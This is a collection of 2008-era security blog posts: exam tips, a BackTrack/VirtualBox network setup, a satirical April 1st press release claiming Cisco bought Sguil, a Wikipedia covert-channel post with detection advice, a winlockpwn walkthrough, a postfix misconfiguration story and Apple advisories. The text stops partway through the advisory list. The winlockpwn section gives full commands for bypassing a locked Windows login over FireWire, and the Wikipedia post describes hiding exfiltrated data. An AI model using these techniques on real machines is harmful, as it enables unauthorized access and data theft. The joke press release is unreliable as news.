Taking the GSSP-C Exam

On a sunny day in March, I strolled through the Begijnhof in Leuven, Belgium (pictures here). My destination was a nice medieval house where I would take the GSSP-C exam (GIAC Secure Software Programmer - C).

This exam is not your usual SANS exam, it's a proctored paper exam, containing 100 multiple-choice questions and has a six hour time limit. Unlike other GIAC certifications, this exam is not offered online and is not open book. The GSSP certification exam is only offered at specific locations given on a number of dates through the year. This time, SANS teamed up with secappdev to organize this exam in Belgium (I believe it was the first time this exam was organized in Europe). Proctor was Pieter Danhieux (GSE).

You have to be fluent in C to attempt this exam (I believe I wrote my first C program in 1984), because a lot of the questions will be code listings where you have to identify errors. The SANS C-handbook has sample questions that give a good idea what to expect. And if you just learned to program in C, you might be able to answer many questions, but I highly doubt you'll manage to provide enough correct answers in the allotted time limit.

Brush up your knowledge of the basic C I/O functions: what is their signature, how do they behave? Trust me, you'll need this during the exam (remember, this exam is not open book).

Read a couple of the recommended books, like Exploiting Software: How to Break Code and Writing Secure Code, Second Edition.

Be prepared for some really hard puzzles, I remember one question where I would have overlooked the error in the C program. It's only because I new the program was faulty, that I persevered and found the f*ing bug!

Another hurdle is the exam format. Tackling 100 questions in 6 hours and transcribing 100 answers correctly with a number 2 pencil on a form is not so trivial. I followed the same strategy I successfully applied during my CISSP exam. Here is my recipe:

I read the first question. If I don’t understand the question, or if I don’t like the question, or if I even don’t feel like answering the question right now, I just move on to the next question. However, even if I skip a question but I’m certain that one or more of the answers are not correct, I cross them out (every time I tell I write something down or make a mark, I do it on the question booklet, unless stated otherwise).

If I try to answer the question but I’m not sure of the right answer, I will cross out the incorrect answers and move on to the next question.
If I answer a question I’m sure about, I put a circle around the number of the question and another one around the letter of the correct answer.

After tackling the last question, I just start the process again from the beginning, skipping the questions I already answered (remember, there’s a circle around the number of an answered question). I repeat this process several times, each cycle gives me more answers. After a couple of hours, I’ve answered about 80% of the questions and I decide to transcribe my answers to the form (I have to be careful to skip the unanswered questions on the form). I review each answered question and transcribe the correct answer to the form. At the same time, I compile a list of all unanswered questions.
I decided to transcribe the answers after completing about 80% because:
1) I want to take the time to correctly transcribe the answers, I don’t want to make mistakes by rushing the job at the end of the 6 hour period allowed for the exam
2) I don’t want to start second-guessing my answers

After 30 minutes, I’ve transcribed all answered questions.

Now I focus on the list of remaining questions. I try to answer each question by eliminating all incorrect answers: what remains must be the correct answer. If more than one answer remains, I select one at random. I start guessing because I don’t want to stay until the end of the exam trying to find the correct answers, I feel confident because of all the other questions I answered. Since a wrong answer does not negatively impact your score, you’re better of answering all questions than leaving some unanswered. The main reason why I tackle the remaining questions like this, is that I don't want to start second-guessing my answers to the questions I felt confident about. Trust me, if you spend too much time toiling over a question where you're clueless, you'll start to doubt everything.

Finally, I transcribe the remaining answers to the form. The list of remaining questions I compiled helps me to identify which answers remain to be transcribed.

It's the first certification exam I really enjoyed, I had fun reviewing all that C code, it's a bit like discovering vulnerabilities.

Six weeks later, I got my detailed score report from SANS. Did I pass? I'll leave you too in suspense, for a couple of seconds...

http://www.giac.org/certified_professionals/listing/gssp-c.php

Running Backtrack in VirtualBox

Seeing as I've just spent the morning trying to get all this up and running I thought I'd create an entry about how to get Backtrack running in VirtualBox.

For those who haven't heard of it, VirtualBox is an open source equivalent to vmware workstation. It does full snapshoting (unlike vmware server) and seems to have a very active support community.

The setup I wanted was for the virtual machine to have its own IP address and full network access. The default setup for VirtualBox is to have NAT based networking so I had to do a bit of work to get full "Host Interface" mode. Unlike vmware, VirtualBox doesn't do all the networking itself you have to do the initial setup yourself. This is done by using tun/tap and bridging. The instructions here work on Arch but should be generic enough for any distro. The install guide has detailed instructions for debian/ubuntu, redhat and suse.

First you need to install uml_utilities and bridge-utils, in Arch:

pacman -S uml_utilities bridge-utils

You then create a bridge and add your main interface to it:

brctl addbr br0
ifconfig eth0 0.0.0.0
brctl addif br0 eth0
ifconfig br0 up

The IP address normally assigned to eth0 now needs to be assigned to br0, so either bring up your dhcp client or hardcode the IP using ifconfig. If you are using ifconfig remember to setup your default route. Also remember to kill any dhcp clients working for eth0.

Next is creating the tun/tap interface. First check if you have the tun module loaded:

lsmod|grep tun

and if not load it:

modprobe tun

The virtual machine is going to get its own interface, this can be named whatever you want, I call mine vbox0. To create it:

tunctl -t vbox0 -u robin

this then needs adding to the bridge:

brctl addif br0 vbox0

and, the bit I missed for a while, brining up:

ifconfig vbox0 up

You also need to check that the device (/dev/net/tun) is accessible by the user who is going to use it. I did this by creating a new vboxusers group, adding myself to it then making sure that the group could read and write from the device:

groupadd vboxuser
usermod -a -G vboxuser robin
chgrp vboxusers /dev/net/tun
chmod g+rw /dev/net/tun

You should now have a working virtual interface.

VirtualBox has a fairly simple GUI for creating new machines so I won't talk through that in detail. Basically, click the create a new machine button, set the memory size and if you want to have a drive for the machine, set that up here as well.

Once you've setup the machine it will appear in the left hand list of available machines. Right click on it and chose settings. Chose Network and change the "Attached to" option to "Host Interface". In the "Interface Name" section at the bottom enter vbox0 (or whatever you called it above).

Next go to the "cd/dvd-rom" section and chose "mount cd/dvd drive" and specify where your backtrack CD id, either ISO or physical location. Click OK and you're done.

Start the machine, it should boot as normal and once up and running should try to get an IP address through dhcp, if you haven't got dhcp you will need to setup the IP manually.

All of this information is available in the VirtualBox manual but I found that some of the scripts it referred to didn't exist or didn't work quite as expected. I also prefer to set this kind of thing up by hand, at least the first few times so that I really know what is going on, once I'm happy then I'll look at scripting it.

Any problems, questions or corrections, let me know.

Cisco Acquires Sguil!!

In many of my past writings I have mentioned using Sguil on my personal blog and have been an avid user of the solution. On that front, I would like to extend my congratulations to the core members of the team for their great success! It will be exciting to see it running on IOS!

Cisco Announces Agreement to Acquire Sguil™ Open Source Security Monitoring Project

Acquisition Furthers Cisco’s Vision for Integrated Security Products

SAN JOSE, Calif., and LONGMONT, Color., April 1st, 2008 – Cisco and the Sguil™ project today announced an agreement for Cisco to acquire the Sguil™ project, a leading Open Source network security solution. With hundreds of installations world-wide, Sguil™ is the de facto reference implementation for the Network Security Monitoring (NSM) model. Sguil™-based NSM will enable Cisco’s customer base to more efficiently collect and analyze security-related information as it traverses their enterprise networks. This acquisition will help Cisco to cement its reputation as a leader in the Open Source movement while at the same time furthering its long-held vision of integrating security into the network infrastructure.

Under terms of the transaction, Cisco has acquired the Sguil™ project and related trademarks, as well as the copyrights held by the five principal members of the Sguil™ team, including project founder Robert "Bamm" Visscher. Cisco will assume control of the open source Sguil™ project including the Sguil.net domain, web site and web site content and the Sguil™ Sourceforge project page. In addition, the Sguil™ team will remain dedicated to the project as Cisco employees, continuing their management of the project on a day-to-day basis.

To date, Sguil™ has been developed primarily in the Tcl scripting language, support for which is already present inside many of Cisco’s routers and switches. The new product, to be known as “Cisco Embedded Monitoring Solution (CEMS)”, will be made available first in Cisco’s carrier-grade products in 3Q08, with support being phased into the rest of the Cisco product line by 4Q09. Linksys-branded device will follow thereafter, though the exact deployment schedule has yet to be announced.

“We’re extremely pleased to announce this deal,” said Cisco’s Chief Security Product Manager Cletus F. Simmons. “For some time, our customers have told us that our existing security monitoring products did not extend far enough into their network infrastructure layer. Not only was it sometimes difficult to intercept and monitor the traffic, but there were often political problems at the customer site with deploying our Intrusion Detection Systems, as management had heard several years ago that they ere ‘dead’. Now, with Sguil™ integrated into all their network devices, they’ll have no choice!”

Although the financial details of the agreement have not been announced, Sguil™ developer Robert Visscher will become the new VP of Cisco Rapid Analysis Products for Security. “This deal means a lot to the Sguil™ project and to me personally,” Visscher explains. “Previously, we had to be content with simply being the best technical solution to enable intrusion analysts to collect and analyze large amounts of data in an extraordinarily efficient manner. But now, we’ll have the additional advantage of the world’s largest manufacturer of networking gear shoving it down their customers’ throats! We will no longer have to concern ourselves with mere technical excellence. Instead, I can worry more about which tropical island to visit next, and which flavor daiquiri to order. You know, the important things.”

About Cisco Systems

Cisco, (NASDAQ: CSCO), is the worldwide leader in networking that transforms how people connect, communicate and collaborate. Information about Cisco can be found at http://www.cisco.com. For ongoing news, please go to http://newsroom.cisco.com.

About Sguil™

Sguil™ is the leading Network Security Monitoring (NSM) framework. It is built for network security analysts by network security analysts. Sguil’s main component is an intuitive GUI that provides access to a wide variety of security related information, including real-time IDS alerts, network session database and full packet captures. Sguil™ was written by Robert “Bamm” Visscher, who was apparently too cheap to buy a book on Java or C.

Again, congrats to the team... if you get a chance, please stop in at #snort-gui on freenode and say hi / congratulate the team.

Cheers,
enhanced

<!-- Hiding Inside Wikipedia -->

It seems that each time I attend Black Hat, I get some new steganography idea.

It's easy to hide data inside the Wikipedia pages. But before I explain how, understand that the general principle of what I will explain applies to most sites where users can edit content. They can all be used as a covert channel, but Wikipedia has become so common that it would have passed under my radar when performing a forensic investigation. But not anymore.

You can use the Wikipedia Sandbox to experiment while avoiding the wrath of the Wiki gods.

Select the edit this page tab to start editing the article:




Prepare the data you want to store on Wikipedia by converting it to a base64 representation (you can ZIP and/or encrypt it before converting it to base64). Insert the base64 data as a hidden comment inside the page:



Save your changes first, and then undo your changes via the history tab:




That's it! From now on, you can retrieve your data by comparing versions:






So how can you detect and prevent this? Disclosure: my analysis is based on observations of the HTTP traffic generated by a browser connecting to Wikipedia, and not by analyzing the MediaWiki software.

Normal Wikipedia requests (browsing the articles) are GET http requests to the wikipedia.org server. Editing a page is done with a POST http request:



So to detect a user updating a Wikipedia page, look for POST requests to Wikipedia. But there are exceptions to this rule. First, previews also use a POST request:



You'll have to look inside the posted form data to differentiate a save from a preview:



Another exception is a user login:



To differentiate these, use the action parameter. It's submit for article updates and submitlogin for a user login.

You can use these criteria (POST request, form data, action parameter) to block edits to the Wikipedia site via a filtering proxy. Of course, this detects and blocks all updates, not only updates to exfiltrate data.

Didier Stevens
https://DidierStevens.com

How To: winlockpwn

winlockpwn is a memory analysis tool released by Adam Boileau of storm.net.nz. This utility exploits firewire's direct memory access. The operating system allows firewire devices to directly read/write memory without having to go through the processor. Sounds handy right? I installed winlockpwn on Ubuntu 7.10 and a fully patched Windows XP SP2 box. The first step is to download the required libraries:

sudo aptitude install libdc1394-13 libraw1394-dev swig python

Now we need to download and install Python 2.3 because I tried to run it using Python 2.5 with no success:

wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar -zxvf Python-2.3.6.tgz
cd Python-2.3.6
./configure
make
sudo make install

The next step is to modify libraw1394:

sudo vim /usr/include/libraw1394/raw1394.h

At this point go ahead and search for “__attribute__((deprecated));” in the file raw1394.h and comment out every line that contains it. Hint: don't forget to end the line above it with a semi-colon. Once you comment all of them out, save and close the file. The next step is to get the pythonraw1394 library. It contains the python bindings for libraw1394, romtool, and businfo from Adam’s site.

wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz

And of course, we need to untar it

tar -zxvf pythonraw1394-1.0.tar.gz

Now we need to go into the untared directory and download the actual winlockpwn script:

cd pythonraw1394
wget http://www.storm.net.nz/static/files/winlockpwn

The winlockpwn script needs to be in the pythonraw1394 directory or it wont work without modifying the code. Also, we need to make it executable:

chmod +x winlockpwn

Now we also need to edit the Makefile for pythonraw1394 to point it to python 2.3's include directory:

sudo vim Makefile

Now change /usr/include/python2.3 to /usr/local/include/python2.3 on lines 5 and 6. Again, save and quit and compile it with the following command:

sudo make

The raw1394 module also needs to also be loaded and the permissions changed on the raw1394 devices:

sudo modprobe raw1394
sudo chmod 666 /dev/raw1394

Now we need to plug into the windows machine and then edit the romtool to reflect the location of python:

sudo vim romtool

Change #!/usr/bin/python to #!/usr/local/bin/python on the first line one of the file.
Repeat the same step for the winlockpwn script as well.
And then load the ipod image onto the firewire port.

./romtool -s 0 ipod.csr

Loading the ipod image onto the firewire port basically fools windows into thinking your linux box is an ipod.
Now we can run businfo to make sure the ipod image is loaded and on what port number it is on as well as making sure you can see your computer on the other end. Mine showed the ipod image loaded onto port number 0 and my windows box on node number 1.
Now, the fun part! Run winlockpwn
as follows:

winlockpwn port node target

Mine looked like this:

./winlockpwn 0 1 1

Once you run winlockpwn, the windows box will accept any password you choose to give it (even a blank password) and unlock the system for you.


There are many security issues that arise from winlockpwn. What is to stop one of the janitorial staff from getting into the CEO's office after hours and immediately getting access to his box because all he did was lock it before he went home? It just goes to show that once someone gains physical access, game over.

---
Danny Howerton
http://metacortexsecurity.com

FAIL: When software tries to be smrt, and sysadmins trust it.

I run servers for a living... lots of severs, for all sorts of people and customers and workloads. Nothing homogeneous or even enterprisey about most of it.

Probably a year ago, I noticed one of my client's webserver VPS instances was spewing mail like an open relay. Some quick checking indicated this wasn't the case, and it wasn't listed on any RBLs either, so I assumed that some random PHP script was easily pwn3d. Since the client didn't care about email at all (sigh, why'd you have me turn it on?!), I just shutdown postfix, saw all the SMTP traffic stop and left it to the client to figure out, since they didn't see fit to have me dig deeper into it, nor could I justify doing it in the absence of financing.

Fast-forward to last week, when said client needed mail turned on. I hesitated and explained why I was reluctant to do this. They assured me that everything had been updated and most of the PHP stuff is gone, aside from a bleeding-edge instance of Wordpress. Okay, that's legit.

I review the config, trash the mail-queue just in case, and fire up postfix.

Nothing (bad) happens instantly, I make note to check it in the morning.

Everything's okay for the rest of the week, 10msg/day, normal email traffic flow for this client

Yesterday morning though, I notice 7412msg/hr being queued. Eeep.

Killing apache seems to have no effect on the flow.

Reviewing mailq shows it's all spam or backscatter. Sigh.
I fix the backscatter problem (shame on me), postfix reload, and then just to be sure, do 'postconf -n' - and everything looks okay there too.
I continue auditing things running on the machine and don't see anything out of the ordinary, and yet postfix continues happily to queue spam.
More rummaging turns up nothing other than postfix being the problem.

And then I found it.

[root@bukkit ~]# postconf | grep mynet
mynetworks = 66/8
mynetworks_style = subnet
...
[root@bukkit ~]#

Postfix made a mistake. An ugly one. So ugly, it allowed 1/256th of the IPv4 Internet relay mail via this server, with impunity.

But it was a minor error, one all sysadmins have made in their careers...

It got the subnet mask wrong.

Now, I'm not 100% certain of why this happens, but thanks to the default subnet mask for Class-A networks of which my allocation is part of, it had a flashback to the 1980s and defaulted to a /8.

And since this parameter defaults to being derived at start-time, it doesn't show up in 'postconf -n', which only shows non-defaulted configuration parameters.

Lesson: Don't trust your software to auto-configure properly every time, and when you're auditing configurations - check everything, not just non-default settings.

I've checked all the other machines I'm responsible for, and haven't seen this happening, so I'll be updating this postfix to a later version soon, but at least I've hardcoded mynetworks for now.

With apologies to the unintended victims, and the rest of the Internet, for making the spam problem worse - not better.

Mea Cupla.

Apple posts update 2008-0002

Apple just posted Apple Security Update 2008-0002. Here's the news, updates for both Leopard and Tiger:

• Security Update 2008-002

AFP Client

CVE-ID: CVE-2008-0044

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Accessing a maliciously crafted afp:// URL may lead to an application termination or arbitrary code execution

Description: Multiple stack buffer overflow issues exist in AFP Client's handling of afp:// URLs. By enticing a user to connect to a malicious AFP Server, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issues through improved bounds checking.

AFP Server

CVE-ID: CVE-2008-0045

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Cross-realm authentication with AFP Server may be bypassed

Description: An implementation issue exists in AFP Server's check of Kerberos principal realm names. This may allow unauthorized connections to the server, when cross-realm authentication with AFP Server is used. This update addresses the issue by through improved checks of Kerberos principal realm names. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Ragnar Sundblad of KTH - Royal Institute of Technology, Stockholm, Sweden for reporting this issue.

Apache

CVE-ID: CVE-2005-3352, CVE-2006-3747, CVE-2007-3847, CVE-2007-5000, CVE-2007-6388

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in Apache 1.3.33 and 1.3.39

Description: Apache is updated to version 1.3.41 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the Apache web site at http://httpd.apache.org For Mac OS X v10.5, Apache version 1.3.x is only shipped on Server configurations. mod_ssl is also updated from version 2.8.24 to 2.8.31 to match the upgraded Apache; no security fixes are included in the update.

Apache

CVE-ID: CVE-2007-5000, CVE-2007-6203, CVE-2007-6388, CVE-2007-6421, CVE-2008-0005

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in Apache 2.2.6

Description: Apache is updated to version 2.2.8 to address several vulnerabilities, the most serious of which may lead to cross-site scripting. Further information is available via the Apache web site at http://httpd.apache.org

AppKit

CVE-ID: CVE-2008-0048

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Usage of the NSDocument API to may lead to arbitrary code execution

Description: A stack buffer overflow exists in the NSDocument API's handling of file names. On most file systems, this issue is not exploitable. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later.

AppKit

CVE-ID: CVE-2008-0049

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A local user may be able to execute arbitrary code with system privileges

Description: A mach port in NSApplication intended for inter-thread synchronization is unintentionally available for inter-process communication. By sending maliciously crafted messages to privileged applications in the same bootstrap namespace, a local user may cause arbitrary code execution with the privileges of the target application. This update addresses the issue by removing the mach port in question and using another method to synchronize. This issue does not affect systems running Mac OS X v10.5 or later.

AppKit

CVE-ID: CVE-2008-0057

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Visiting a maliciously crafted website may lead to arbitrary code execution

Description: Multiple integer overflow vulnerabilities exist in the parser for a legacy serialization format. By causing a maliciously formatted serialized property list to be parsed, an attacker could trigger a heap-based buffer overflow which may lead to arbitrary code execution. This update addresses the issue by performing additional validation of serialized input. This issue does not affect systems running Mac OS X v10.5 or later.

AppKit

CVE-ID: CVE-2008-0997

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Querying a network printer may cause an unexpected application termination or arbitrary code execution

Description: A stack based buffer overflow exists in AppKit's handling of PPD files. By enticing a user to query a network printer, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improved handling of PPD files. This issue does not affect systems running Mac OS X v10.5 or later.

Application Firewall

CVE-ID: CVE-2008-0046

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: The German translation of the Application Firewall preference pane was misleading

Description: The "Set access for specific services and applications" radio button of the Application Firewall preference pane was translated into German as "Zugriff auf bestimmte Dienste und Programme festlegen", which is "Set access to specific services and applications". This might lead a user to believe that the listed services were the only ones that would be permitted to accept incoming connections. This update addresses the issue by changing the German text to semantically match the English text. This issue does not affect systems prior to Mac OS X v10.5.

CFNetwork

CVE-ID: CVE-2008-0050

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A malicious proxy server may spoof secure websites

Description: A malicious HTTPS proxy server may return arbitrary data to CFNetwork in a 502 Bad Gateway error. A malicious proxy server could use this to spoof secure websites. This update addresses the issue by returning an error on any proxy error, instead of returning the proxy-supplied data. This issue is already addressed in systems running Mac OS X v10.5.2.

ClamAV

CVE-ID: CVE-2007-3725, CVE-2007-4510, CVE-2007-4560, CVE-2007-5759, CVE-2007-6335, CVE-2007-6336, CVE-2007-6337, CVE-2008-0318, CVE-2008-0728

Available for: Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in ClamAV 0.90.3

Description: Multiple vulnerabilities exist in ClamAV 0.90.3 provided with Mac OS X Server v10.5 systems, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to ClamAV 0.92.1. Further information is available via the ClamAV website at www.clamav.net

ClamAV

CVE-ID: CVE-2006-6481, CVE-2007-1745, CVE-2007-1997, CVE-2007-3725, CVE-2007-4510, CVE-2007-4560, CVE-2007-0897, CVE-2007-0898, CVE-2008-0318, CVE-2008-0728

Available for: Mac OS X Server v10.4.11

Impact: Multiple vulnerabilities in ClamAV 0.88.5

Description: Multiple vulnerabilities exist in ClamAV 0.88.5 provided with Mac OS X Server v10.4.11, the most serious of which may lead to arbitrary code execution. This update addresses the issue by updating to ClamAV 0.92.1. Further information is available via the ClamAV website at www.clamav.net

CoreFoundation

CVE-ID: CVE-2008-0051

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A local user may be able to execute arbitrary code with system privileges

Description: An integer overflow exists in CoreFoundation's handling of time zone data. This may allow a local user to cause arbitrary code execution with system privileges. This update addresses the issue through improved bounds checking on time zone data files. This issue does not affect systems running Mac OS X v10.5 or later.

CoreServices

CVE-ID: CVE-2008-0052

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Visiting a website could cause files to be opened in AppleWorks

Description: Files with names ending in ".ief" can be automatically opened in AppleWorks if Safari's "Open 'Safe' files" preference is enabled. This is not the intended behavior and could lead to security policy violations. This update addresses the issue by removing ".ief" from the list of safe file types. This issue only affects systems prior to Mac OS X v10.5 with AppleWorks installed.

CUPS

CVE-ID: CVE-2008-0596

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A remote attacker may be able to cause an unexpected application termination if printer sharing is enabled

Description: A memory leak exists in CUPS. By sending a large number of requests to add and remove shared printers, an attacker may be able to cause a denial of service. This issue can not result in arbitrary code execution. This update addresses the issue through improved memory management. This issue does not affect systems prior to Mac OS X v10.5.

CUPS

CVE-ID: CVE-2008-0047

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A remote attacker may be able to cause an unexpected application termination or arbitrary code execution if printer sharing is enabled

Description: A heap buffer overflow exists in the CUPS interface's processing of search expressions. If printer sharing is enabled, a remote attacker may be able to cause an unexpected application termination or arbitrary code execution with system privileges. If printer sharing is not enabled, a local user may be able to gain system privileges. This update addresses the issue by performing additional bounds checking. This issue does not affect systems prior to Mac OS X v10.5. Credit to regenrecht working with the VeriSign iDefense VCP for reporting this issue.

CUPS

CVE-ID: CVE-2008-0053, CVE-2008-0882

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in CUPS may lead to an unexpected application termination or arbitrary code execution with system privileges

Description: Multiple input validation issues exist in CUPS, the most serious of which may lead to arbitrary code execution with system privileges. This update addresses the issues by updating to CUPS 1.3.6. These issues do not affect systems prior to Mac OS X v10.5.

curl

CVE-ID: CVE-2005-4077

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Running curl with a maliciously crafted URL may lead to an unexpected application termination or arbitrary code execution

Description: A one byte buffer overflow exists in curl 7.13.1. By enticing a user to run curl with a maliciously crafted URL, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue by updating curl to version 7.16.3. Crash Reporter was updated to match the curl changes. This issue does not affect systems running Mac OS X v10.5 or later.

Emacs

CVE-ID: CVE-2007-6109

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Format string vulnerability in Emacs Lisp may lead to an unexpected application termination or possibly arbitrary code execution

Description: A stack buffer overflow exists in Emacs' format function. By exploiting vulnerable Emacs Lisp which allows an attacker to provide a format string containing a large precision value, an attacker may cause an unexpected application termination or possibly arbitrary code execution. Further information on the patch applied is available via the Savannah Emacs website here.

Emacs

CVE-ID: CVE-2007-5795

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Safe mode checks in Emacs may be bypassed

Description: A logic error in Emacs' hack-local-variable function allows any local variable to be set, even if `enable-local-variables' is set to :safe. By enticing a user to load a file containing a maliciously crafted local variables declaration, a local user may cause an unauthorized modification of Emacs Lisp variables leading to arbitrary code execution. This issue has been fixed through improved :safe mode checks. The patch applied is available via the Savannah Emacs website here.
This issue does not affect systems prior to Mac OS X v10.5.

file

CVE-ID: CVE-2007-2799

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Running the file command on a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution

Description: An integer overflow vulnerability exists in the file command line tool, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Colin Percival of the FreeBSD security team for reporting this issue.

Foundation

CVE-ID: CVE-2008-0054

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Usage of the NSSelectorFromString API may result in an unexpected method being called

Description: An input validation issue exists in the NSSelectorFromString API. Passing it a malformed selector name may result in the return of an unexpected selector, which could lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by performing additional validation on the selector name. This issue does not affect systems running Mac OS X v10.5 or later.

Foundation

CVE-ID: CVE-2008-0055

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A local user can interfere in other users' file operations and may be able to obtain elevated privileges

Description: When performing a recursive file copying operation, NSFileManager creates directories as world-writable, and only later restricts the permissions. This creates a race condition during which a local user can manipulate the directory and interfere in subsequent operations. This may lead to a privilege escalation to that of the application using t he API. This update addresses the issue by creating directories with restrictive permissions. This issue does not affect systems running Mac OS X v10.5 or later.

Foundation

CVE-ID: CVE-2008-0056

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Programs using the NSFileManager API could be manipulated to execute arbitrary code

Description: A long pathname with an unexpected structure can expose a stack buffer overflow vulnerability in NSFileManager. Presenting a specially crafted path to a program using NSFileManager could lead to the execution of arbitrary code. This update addresses the issue by ensuring a properly sized destination buffer. This issue does not affect systems running Mac OS X v10.5 or later.

Foundation

CVE-ID: CVE-2008-0058

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Visiting a maliciously crafted website may lead to a denial of service or arbitrary code execution

Description: A thread race condition exists in NSURLConnection's cache management, which can cause a deallocated object to receive messages. Triggering this issue may lead to a denial of service, or arbitrary code execution with the privileges of Safari or another program using NSURLConnection. This update addresses the issue by removing an unsynchronized caching operation. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Daniel Jalkut of Red Sweater Software for reporting this issue.

Foundation

CVE-ID: CVE-2008-0059

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Processing an XML document may lead to an unexpected application termination or arbitrary code execution

Description: A race condition exists in NSXML. By enticing a user to process an XML file in an application which uses NSXML, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improvements to the error handling logic of NSXML. This issue does not affect systems running Mac OS X v10.5 or later.

Help Viewer

CVE-ID: CVE-2008-0060

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Accessing a maliciously crafted help: URL may lead to arbitrary Applescript execution

Description: A malicious help:topic_list URL may insert arbitrary HTML or JavaScript into the generated topic list page, which may redirect to a Help Viewer help:runscript link that runs Applescript. This update addresses the issue by performing HTML escaping on the URL data used in help topic lists before building the generated page. Credit to Brian Mastenbrook for reporting this issue.

Image Raw

CVE-ID: CVE-2008-0987

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Viewing a maliciously crafted image may lead to an unexpected application termination or arbitrary code execution

Description: A stack based buffer overflow exists in the handling of Adobe Digital Negative (DNG) image files. By enticing a user to open a maliciously crafted image file, an attacker may cause an unexpected application termination or arbitrary code execution. This update addresses the issue through improved validation of DNG image files. This issue does not affect systems prior to Mac OS X v10.5. Credit to Clint Ruoho of Laconic Security for reporting this issue.

Kerberos

CVE-ID: CVE-2007-5901, CVE-2007-5971, CVE-2008-0062, CVE-2008-0063

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Multiple vulnerabilities in MIT Kerberos 5 may lead to an unexpected application termination or arbitrary code execution with system privileges

Description: Multiple memory corruption issues exist in MIT Kerberos 5, which may lead to an unexpected application termination or arbitrary code execution with system privileges. Further information on the issues and the patches applied is available via the MIT Kerberos website at http://web.mit.edu/Kerberos/ CVE-2008-0062 and CVE-2008-0063 do not affect systems running Mac OS X v10.5 or later. CVE-2007-5901 does not affect systems prior to Mac OS X v10.4.

libc

CVE-ID: CVE-2008-0988

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: Applications that use the strnstr API could be vulnerable to a denial of service

Description: An off by one issue exists in Libsystem's strnstr(3) implementation. Applications that use the strnstr API can read one byte beyond the limit specified by the user, which may lead to an unexpected application termination. This update addresses the issue through improved bounds checking. This issue does not affect systems running Mac OS X v10.5 or later. Credit to Mike Ash of Rogue Amoeba Software for reporting this issue.

mDNSResponder

CVE-ID: CVE-2008-0989

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A local user may be able to execute arbitrary code with system privileges

Description: A format string issue exists in mDNSResponderHelper. By setting the local hostname to a maliciously crafted string, a local user could cause a denial of service or arbitrary code execution with the privileges of mDNSResponderHelper. This update addresses the issue by using a static format string. This issue does not affect systems prior to Mac OS X v10.5.

notifyd

CVE-ID: CVE-2008-0990

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11

Impact: A local user may be able to deny access to notifications

Description: notifyd accepts Mach port death notifications without verifying that they come from the kernel. If a local user sends fake Mach port death notifications to notifyd, applications that use the notify(3) API to register for notifications may never receive the notifications. This update addresses the issue by only accepting Mach port death notifications from the kernel. This issue does not affect systems running Mac OS X v10.5 or later.

OpenSSH

CVE-ID: CVE-2007-4752

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: A remote attacker may be able to execute arbitrary code with elevated privileges

Description: OpenSSH forwards a trusted X11 cookie when it cannot create an untrusted one. This may allow a remote attacker to gain elevated privileges. This update addresses the issue by updating OpenSSH to version 4.7. Further information is available via the OpenSSH website here.

pax archive utility

CVE-ID: CVE-2008-0992

Available for: Mac OS X v10.5.2, Mac OS X Server v10.5.2

Impact: Running the pax command on a maliciously crafted archive may lead to arbitrary code execution

Description: The pax command line tool does not check a length in its input before using it as an array index, which may lead to an unexpected application termination or arbitrary code execution. This update addresses the issue by checking the index. This issue does not affect systems prior to Mac OS X v10.5.

PHP

